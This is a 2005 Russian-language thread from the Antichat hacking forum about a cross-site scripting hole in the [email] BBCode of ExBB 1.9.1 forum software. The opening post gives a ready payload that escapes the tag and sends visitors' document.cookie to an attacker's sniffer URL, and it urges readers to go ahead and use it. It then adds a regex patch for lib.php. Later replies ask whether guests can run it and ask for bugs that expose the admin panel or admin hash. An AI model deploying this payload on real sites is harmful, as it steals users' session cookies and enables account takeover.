HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу XSS ExBB 1.9.1
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

XSS ExBB 1.9.1
  #1  
Старый 14.04.2005, 01:47
Kihamo
Новичок
Регистрация: 14.01.2005
Сообщений: 4
Провел на форуме:
5921

Репутация: 0
По умолчанию XSS ExBB 1.9.1
Ахтунг!
Недавно в инете появилась инфа о xss в bbcode url, разрабочтик исправил ошибку, но как оказалось не везде =)
И так поехали. Сразу предупрежу, что данная бага работает только в Internet Explorer . Суть состоит в том, что одна из форм записи bbcode email пропускает нужные нам символы, что позволяет выйти за пределы тега. Вот пример XSS
Код:
[ email]'style='display:none;background:url(javascript:document.images[2].src="http://you_sniffer_url/sniffer.php?"+document.cookie)[/email]
Думаю, что где и как все это работает объяснять не надо. Так что дерзайте =)
А теперь инфа добропорядочным юзерам. Раз разработчик думать не хочет, бум думать за него =)
Открываем файл lib.php и в примерно в 588 строке находим такой код
Код:
$post = preg_replace( "#\[email\](\S+?)\[/email\]#i", "<a href='mailto:\\1'>\\1</a>", $post );
и заменяем его на
Код:
$post = preg_replace( "#\[email\]([a-z0-9&\-_.]+?@[\w\-]+\.([\w\-\.]+\.)?[\w]+)\[/email\]#i", "<a href='mailto:\\1'>\\1</a>", $post );
За сим усе.
 
Ответить с цитированием

  #2  
Старый 25.04.2005, 02:40
BNF
Познающий
Регистрация: 16.04.2005
Сообщений: 62
Провел на форуме:
53206

Репутация: 5
По умолчанию
а если от гостя вставлять этот код то должно работать?
 
Ответить с цитированием

  #3  
Старый 25.04.2005, 04:35
White Jordan
Banned
Регистрация: 21.04.2005
Сообщений: 5
Провел на форуме:
0

Репутация: -2
По умолчанию
На этом форуме только полный идиот багу найти не сможет.
 
Ответить с цитированием

  #4  
Старый 25.04.2005, 15:03
rsha1988
Участник форума
Регистрация: 03.01.2005
Сообщений: 270
Провел на форуме:
58594

Репутация: 6
По умолчанию
Цитата:
Сообщение от White Jordan  
На этом форуме только полный идиот багу найти не сможет.
хм, ну тогда если ты самый умный то найди багу через которую можно залезть в админ панель или получить хеш админа (разумееться чтоб бага работала на форуме в который админ просто не заходит)...
 
Ответить с цитированием

  #5  
Старый 25.04.2005, 19:18
KEZ
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию
White Jordan какие проблемы? Почему ты не нашел багу и не выложил ее, не сделал видео? ты хуже идиота?
 
Ответить с цитированием

  #6  
Старый 04.05.2005, 11:03
salikin
Новичок
Регистрация: 07.03.2005
Сообщений: 7
Провел на форуме:
17199

Репутация: 0
По умолчанию
мля, не работает!
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.